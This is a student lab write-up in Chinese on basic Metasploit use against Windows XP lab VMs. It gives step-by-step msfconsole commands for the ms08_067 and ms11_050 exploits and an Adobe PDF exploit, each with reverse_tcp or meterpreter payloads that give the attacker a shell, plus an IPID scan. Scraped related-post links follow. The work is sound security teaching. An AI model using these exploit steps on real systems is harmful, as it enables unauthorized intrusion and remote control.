20155305《网络对抗》MSF基础应用
20155305《网络对抗》MSF基础应用
实验过程
实验系统
- 靶机1:Windows XP Professional SP2 ,IP地址:192.168.1.108
- 靶机2:Windows XP Professional SP3 简体中文,IP地址:192.168.1.113
- windows XP的虚拟机安装可以在这个网址下载iso镜像,至于序列号就百度吧,会有很多。
- Kali IP地址:192.168.1.105
1、主动攻击:ms08_067
- 使用靶机1和Kali
先msfconsole
进入msf,再用search ms08_067
查询一下针对该漏洞的攻击模块:
- 用
use exploit/windows/smb/ms08_067_netapi
使用该模块:
- 用
show targets
查看可以被攻击的靶机的操作系统型号:
- 用
show payloads
查看可以供我们使用的攻击载荷:
- 从中找到一个可用的攻击载荷
generic/shell_reverse_tcp
,用set payload generic/shell_reverse_tcp
设置payload:
- 用
show options
查看需要设置的参数:
- 这里需要设置RHOST(靶机IP)和LHOST(Kali的IP),使用
set 需设置的参数名 参数值
命令即可设置:
- 设置target选项目标(例如我攻击系统为WIN xp 中文简体 SP2,所以选择10)
- 用
show options
确认需要设置的参数是否已经设置好:
- 确认参数设置无误后,用
exploit
指令开始攻击:
- 攻击成功后会获取靶机的shell,可以对其进行操作:
2、针对浏览器的攻击:ms11_050
- 使用靶机2和Kali(一开始用自己的最后会有问题,所以换了老师之前的kali)
用search ms11_050
查询一下针对该漏洞的攻击模块,并用use windows/browser/ms11_050_mshtml_cobjectelement
使用该模块:
- 用
info
查看该模块的信息(这个指令相当于show targets
、show options
等的集合版):
基本信息:
- targets信息:
- options信息:
- 用
set payload windows/meterpreter/reverse_tcp
设置payload,并设置需要设置的参数。
用show options
确认需要设置的参数是否已经设置好:
- 确认参数设置无误后,用exploit指令开始攻击,攻击成功后会有靶机需要访问的网址:
- 在靶机IE上输入该网址:
- kali中显示session 1已经创建,并显示其会话ID:
- 输入sessions -i 1,成功获取靶机的shell,可以对其进行操作:
3、针对客户端的攻击:adobe_toolbutton
- 使用靶机1和Kali
用search adobe
查询一下针对该漏洞的攻击模块:
- 选择一个模块并使用该模块:
- 用
show targets
查看可以被攻击的靶机的操作系统型号:
- 设置payload攻击载荷,命令
set payload windows/meterpreter/reverse_tcp
- 用
show options
查看需要设置的参数:
- 设置相应参数,实施
exploit
攻击,发现在/root/.msf4/local/目录下成功生成了一个qiaolei05.pdf文件:
- 这个时候你可能在你的kali中找不到这个pdf文件,那么打开文件夹的隐藏文件显示就可以找到啦
- 将pdf文件粘贴到靶机win xp
- 在kali中和前几次实验一样打开并设置监听模块
use exploit/multi/handler
,set payload windows/meterpreter/reverse_tcp
,再设置IP以及端口
- 在靶机上打开刚刚那个pdf文件(这个时候可能xp没有adobe就需要下载一波,地址呢可以到这里下载),可以观察到Kali成功获取了靶机的shell,可以对其进行操作:
4、成功应用任何一个辅助模块:ipidseq
- ipidseq
功能:扫描网段中的存活ip,它会识别被发现主机的IPID(用于跟踪IP包的次序的一种技术)序列模式,并且表示出哪些是0、随机或递增的。
拥有递增的IPID的空闲(空闲是指该主机在特定时间内不向网络发送数据包)主机(即显示为`Incremental!`的条目),不会被网络上的其它主机严重影响,可以用来进行TCP空闲扫描。
TCP空闲扫描:是一种高级的nmap扫描方式,这种扫描方式能让我们冒充网络上另一台主机的IP地址对目标进行更为隐秘的扫描。
- 用
show auxiliary
查看所有辅助模块,并选择其中的一个,选的是scanner/ip/ipidseq:
- 查看需要设置的参数,设置完成后确认一下,这里可以进行对单一目标主机的扫描,然后就可以开始
exploit
了。
- 也可以对指定网段的主机进行扫描:
实验总结和收获
- 讲道理感觉最难就是虚拟机了,大概下载了十个镜像做实验,就大概屡战屡改,xp的简体中文,台湾版,繁体版都有下载过,最后还是用了简体中文,难得的是居然用的还不错,虽然又在里面下了一些别的需要用的,比如adobe reader。至于英文版呢,因为正好下载英文版的时候网速奇差无比,直接就没试验了,虽然感觉学长学姐大多用的全是英文版english。
- 第三个pdf我还试了试传进了主机,结果一传进来就被查杀了,还看到一个很新鲜的病毒词汇,脚本病毒,和以前的后门被查杀还不一样呢哈哈。
- 实验确实有意思,体会了黑客的感觉,虽然都是以前的xp版本,但还是收获颇丰,而且蛮喜欢这种学知识的方式。
20155305《网络对抗》MSF基础应用的更多相关文章
- 网络对抗——web基础
网络对抗--web基础 实践内容 (1)Web前端HTML (2)Web前端javascipt (3)Web后端:MySQL基础:正常安装.启动MySQL,建库.创建用户.修改密码.建表 (4)Web ...
- 2018-2019 20165237网络对抗 Exp5 MSF基础应用
2018-2019 20165237网络对抗 Exp5 MSF基础应用 实验目标 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实践,如 ...
- 2018-2019 20165221 网络对抗 Exp5 MSF基础
2018-2019 20165221 网络对抗 Exp5 MSF基础 实践内容: 重点掌握metassploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实践,如ms0 ...
- 2018-2019-2 20165325 《网络对抗技术》 Exp5:MSF基础应用
2018-2019-2 20165325 <网络对抗技术> Exp5:MSF基础应用 实验内容(概要) 1.1 一个主动攻击实践,本实验选择 ms17_010_eternalblue(成功 ...
- 2018-2019 20165235 网络对抗 Exp5 MSF基础
2018-2019 20165235 网络对抗 Exp5 MSF基础 1. 实践内容(3.5分) 1.1一个主动攻击实践 攻击方:kali 192.168.21.130 靶机: win7 192.16 ...
- 2018-2019-2 20165311《网络对抗技术》Exp5 MSF基础应用
<网络对抗技术>Exp5 MSF基础应用 实验目的 实验内容 一个主动攻击实践(ms08_067) 一个针对浏览器的攻击(ms11_050) 一个针对客户端的攻击(adobe_toolbu ...
- 2018-2019-2 网络对抗技术 20165317 Exp5 MSF基础应用
2018-2019-2 网络对抗技术 20165317 Exp5 MSF基础应用 一.原理与实践说明 1.实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具 ...
- 2018-2019-2 网络对抗技术 20165225 Exp5 MSF基础应用
2018-2019-2 网络对抗技术 20165225 Exp5 MSF基础应用 验前准备 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻 ...
- 2018-2019-2 网络对抗技术 20165236 Exp5 MSF基础应用
2018-2019-2 网络对抗技术 20165236 Exp5 MSF基础应用 一. 实践内容(3.5分) 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要 ...
随机推荐
- Java虚拟机(三)垃圾标记算法与Java对象的生命周期
前言 这一节我们来简单的介绍垃圾收集器,并学习垃圾标记的算法:引用计数算法和根搜索算法,为了更好的理解根搜索算法,会在文章的最后介绍Java对象在虚拟机中的生命周期. 1.垃圾收集器概述 垃圾收集器( ...
- 第一篇 Windows docker 概述
本人行业属于智能制造,偏向工厂应用,客户端程序全部是.Net 的 WinForm:本系统的后台是.Net,多系统交互的有java的:因系统发布效率问题,想采用docker Windows 的生产力环境 ...
- 类与接口(二)java的四种内部类详解
引言 内部类,嵌套在另一个类的里面,所以也称为 嵌套类; 内部类分为以下四种: 静态内部类 成员内部类 局部内部类 匿名内部类 一.静态内部类 静态内部类: 一般也称"静态嵌套类" ...
- Web服务架构风格之REST
REST(Representational State Transfer)是一种Web服务的架构,其目的是创建具有良好扩展性的分布式系统.它的约束包含: 使用C/S模型.client和server之间 ...
- Windows Server查看和记录远程登录信息的方法
前两天我的一台Windows Server 2012R2的服务器中了传说中的cryptowall病毒,所有数据文件都被加密,需要我支付1个比特币才能解码.幸好服务器上没什么重要的文件,还好我没钱,我选 ...
- 大数据开发实战:HDFS和MapReduce优缺点分析
一. HDFS和MapReduce优缺点 1.HDFS的优势 HDFS的英文全称是 Hadoop Distributed File System,即Hadoop分布式文件系统,它是Hadoop的核心子 ...
- <button>与<input type="button">
在做form表单,点击按钮随机生成两串密钥的时候 1.用第一种按钮的时候,会出现刷新form表单的现象.会把创建密钥前面的输入框中的字消失.虽然能生成密钥1和密钥2,但是会闪一下,随即消失.几个输入框 ...
- Docker容器学习与分享07
Docker容器网络 在分享06中学完了bridge网络,接着学习none网络和host网络. Docker在安装时会在host上默认创建三个网络,分别是bridge.host.null. [root ...
- HDFS核心设计
一.HDFS核心设计 数据块(block) 数据块是HDFS上最基本的存储单位 HDFS块默认大小为128M 对块进行抽象会带来的好处 一个小文件的大小可以大于网络中任意一个磁盘的容量 ...
- Javaweb学习(三):Servlet程序
好了,既然开发环境已经配置好了.那么我们首先要搞定得便是servlet了,至于为什么不先去研究jsp,这是因为jsp与servlet本就是一体两面,jsp其本身经过编译.载入.转化等步骤最终会成为se ...